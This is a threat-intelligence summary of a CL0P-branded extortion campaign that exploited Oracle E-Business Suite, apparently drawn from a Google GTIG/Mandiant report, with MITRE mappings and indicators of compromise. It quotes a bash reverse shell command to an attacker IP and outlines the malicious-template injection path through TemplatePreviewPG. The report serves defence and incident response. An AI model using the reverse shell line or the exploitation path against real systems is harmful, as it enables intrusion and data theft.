Google Threat Intelligence Group and Mandiant tracked a large-scale CL0P-branded extortion campaign that leveraged zero-day exploitation of Oracle E-Business Suite (EBS), including activity as early as July 2025 and a likely CVE-2025-61882 chain exploited from Aug. 9, 2025. The actors used Java-based in-memory payload chains (GOLDVEIN.JAVA and SAGE* family), sent extortion emails using [email protected]/.net, and exfiltrated data from impacted EBS environments. #CVE-2025-61882 #GOLDVEIN.JAVA
Keypoints
- Starting Sept 29, 2025, a high-volume extortion email campaign claimed theft of Oracle EBS data and used contact addresses [email protected] and [email protected].
- GTIG and Mandiant identified exploitation activity targeting Oracle EBS beginning in July 2025, with exploitation of SyncServlet and UiServlet components and likely use of CVE-2025-61882.
- Threat actors injected malicious XSL templates stored in XDO_TEMPLATES_B (TemplateCode prefixed TMP/DEF) to execute Base64-encoded Java payloads via TemplatePreviewPG requests.
- Two primary Java-based infection chains observed: GOLDVEIN.JAVA (downloader/beacon) and the SAGE* family (SAGEGIFT → SAGELEAF → SAGEWAVE) enabling in-memory loading, persistence, and remote deployment.
- Observed C2 and exploitation infrastructure included IPs such as 200.107.207.26 and 161.97.99.49, and GOLDVEIN.JAVA C2 hosts like 162.55.17.215:443 and 104.194.11.200:443.
- Post-exploitation activity included reconnaissance commands run as the applmgr EBS account and reverse shell connections (example: bash -i >/dev/tcp/200.107.207.26/53).
- GTIG recommends immediate application of Oct 4 emergency patches, hunting for malicious templates in XDO_TEMPLATES_B/XDO_LOBS, restricting outbound internet access, and memory forensics of Java processes.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers exploited Oracle EBS UiServlet and SyncServlet to achieve remote code execution. Quote: ‘…targeting /OA_HTML/configurator/UiServlet…’ and ‘…initiated with a POST request to /OA_HTML/SyncServlet.’
- [T1059] Command and Scripting Interpreter – Executed shell commands and reverse shells via bash (e.g., ‘bash -i >& /dev/tcp// 0>&1’) to run reconnaissance and control commands.
- [T1105] Ingress Tool Transfer – GOLDVEIN.JAVA downloader retrieved second-stage payloads from attacker-controlled C2 servers. Quote: ‘…makes a request back to an attacker-controlled command-and-control (C2 or C&C) IP address to retrieve and execute a second-stage payload.’
- [T1218] Signed Binary Proxy Execution (Java execution in-memory) – Java-based reflective loaders (SAGEGIFT/SAGELEAF) were used to load and execute payloads in memory rather than from disk. Quote: ‘…custom Java reflective class loader… used to load SAGELEAF, an in-memory dropper…’
- [T1505] Server Software Component – Malicious Java servlet filters (SAGEWAVE) were installed to persist and filter HTTP requests for payload deployment. Quote: ‘…install SAGEWAVE, a malicious Java servlet filter that allows the actor to deploy an AES-encrypted ZIP archive with Java classes in it.’
- [T1020] Automated Exfiltration / [T1041] Exfiltration Over C2 Channel – Data exfiltration and command results were returned to actors within HTTP responses (HTML comments) and via outbound C2 connections. Quote: ‘…contains logging functionality that returns the execution result to the actor in the HTTP response, within an HTML comment.’
Indicators of Compromise
- [IP Address] exploitation and C2 – 200.107.207.26 (observed in UiServlet and SyncServlet exploitation), 161.97.99.49 (observed targeting UiServlet).
- [IP:Port] GOLDVEIN.C2 – 162.55.17.215:443, 104.194.11.200:443 (identified as GOLDVEIN.JAVA C2 servers).
- [Email] extortion contact addresses – [email protected], [email protected] (used in CL0P extortion emails and listed on CL0P DLS).
- [HTTP Path Substring] SAGEWAVE filter indicators – /help/state/content/destination./navId.1/navvSetId.iHelp/ and /support/state/content/destination./navId.1/navvSetId.iHelp/ (used for request filtering by SAGEWAVE).
<li/[HTTP Endpoint] suspicious request paths – /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (TemplateCode starting with TMP or DEF indicates malicious template trigger), /OA_HTML/SyncServlet.